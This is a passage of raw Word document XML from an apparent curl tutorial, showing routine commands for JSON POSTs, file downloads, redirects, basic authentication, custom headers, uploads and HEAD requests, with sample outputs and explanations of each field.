        <w:t>access-control headers: CORS headers allowing cross-origin requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C051220" w14:textId="60349CA4" w:rsidR="00C702AF" w:rsidRPr="00C702AF" w:rsidRDefault="00C702AF" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:t>JSON response body: Request details echoed back by httpbin.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69955B4B" w14:textId="049175E0" w:rsidR="00C702AF" w:rsidRPr="00C702AF" w:rsidRDefault="00C702AF" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:t>args: Query parameters (empty in this case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DC4E40" w14:textId="1FB3BDD8" w:rsidR="00C702AF" w:rsidRPr="00C702AF" w:rsidRDefault="00C702AF" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:t>headers: Request headers sent by curl including User-Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB2A659" w14:textId="758F7C4C" w:rsidR="00C702AF" w:rsidRPr="00C702AF" w:rsidRDefault="00C702AF" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:t>origin: Client's public IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26181D26" w14:textId="6EE5ECAD" w:rsidR="00C702AF" w:rsidRPr="00C702AF" w:rsidRDefault="00C702AF" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:t>url: The exact URL that was requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D067C26" w14:textId="047373B6" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Debug HTTP responses and examine headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD59745" w14:textId="34754304" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>POST request with JSON data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919074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X POST -H "Content-Type: application/json" -d '{"name":"test","value":"123"}' https://httpbin.org/post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00385CFA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Test API endpoints that accept JSON data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5388D0" w14:textId="4393F120" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Download file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B44A8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O https://example.com/file.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179D449B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075DB1B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Total    % Received % Xferd  Average Speed   Time    Time     Time  Current</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3078B22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Dload  Upload   Total   Spent    Left  Speed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2157136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100 15.2M  100 15.2M    0     0  2048k      0  0:00:07  0:00:07 --:--:-- 2189k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249027B8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49507464" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Progress bar</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Real-time download progress display</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8E0329" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>100% Complete</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Download successfully finished (100 15.2M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C05C7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2M file size</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Downloaded 15.2 megabytes total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63165A83" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2048k avg speed</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Average download speed of ~2MB/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9B4EC5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0:00:07 duration</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Download completed in 7 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4029CD15" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2189k current</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Current download speed at completion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAD7FAA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-O flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Saves file with original name from URL (file.zip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010758DB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No upload (0)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Download-only operation, no data sent to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E87099" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Download files with original filename.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D34696A" w14:textId="37520E90" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Save to specific filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBCBF9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o myfile.html https://example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0EEF44" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FDD90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Total    % Received % Xferd  Average Speed   Time    Time     Time  Current</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7C76E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Dload  Upload   Total   Spent    Left  Speed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB4C9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100  1256  100  1256    0     0   4521      0 --:--:-- --:--:-- --:--:--  4533</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E55B27" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE6A009" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>% Total</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Percentage of total transfer completed (100%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4396744D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>% Received</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Percentage of download completed (100%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF891B3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>% Xferd</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Percentage of upload completed (0% - no upload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FA772A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1256</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Total bytes downloaded (1256 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABA58E7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4521</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Average download speed in bytes per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F17D2B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--:--:--</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Time format showing total time, time spent, and time left</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205BC027" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4533</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Current transfer speed in bytes per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE7505C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Progress indicator</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows real-time download progress and performance metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1702E278" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Download and save with custom filename.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B6D19C" w14:textId="4D8FB84D" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Follow redirects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54943A7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L https://bit.ly/shortened-url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5593DD8B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Handle URL redirects automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A6F012" w14:textId="324C3FA1" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Basic authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33549C76"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u username:password https://api.example.com/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50031E01" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Access protected API endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A2DC9D" w14:textId="286EFED9" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Custom headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF63B1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H "Authorization: Bearer token123" -H "Accept: application/json" https://api.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D46BDB2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> API authentication and content negotiation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE840A9" w14:textId="64B37B35" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Upload file via POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62057BE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X POST -F "file=@document.pdf" https://upload.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076FCF20" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Upload files to web services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6769AF8D" w14:textId="4D21F64E" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>HEAD request (headers only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C80A58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I https://example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5A8501" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AD5F3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HTTP/2 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732A916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ontent-encoding: gzip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43180C4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accept-ranges: bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9B1E9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age: 603114</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F2305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ache-control: max-age=604800</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273497FA"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ontent-type: text/html; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B711A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date: Fri, 06 Dec 2024 14:30:15 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352D50F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etag: "3147526947"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2687118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expires: Fri, 13 Dec 2024 14:30:15 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B7678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last-modified: Thu, 17 Oct 2019 07:18:26 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650C05A1"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erver: EOS (vny/0453)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1940CBE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lastRenderedPageBreak/>
        <w:t>x-cache: HIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DC262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ontent-length: 1256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B084F4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E955DE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 200</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Protocol version and success status code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FD53A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>content-encoding: gzip</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Response is compressed to save bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF3F906" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>accept-ranges: bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Server supports partial content requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A524D6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>age: 603114</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Content has been cached for 603114 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6182EE6C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cache-control: max-age=604800</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Content valid for 7 days (604800 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7701866A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>content-type</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: MIME type and character encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108E80E7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: When server generated the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F3E314" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>etag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Entity tag for cache validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B42D8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>expires</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: When cached content becomes stale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20202460" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>last-modified</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
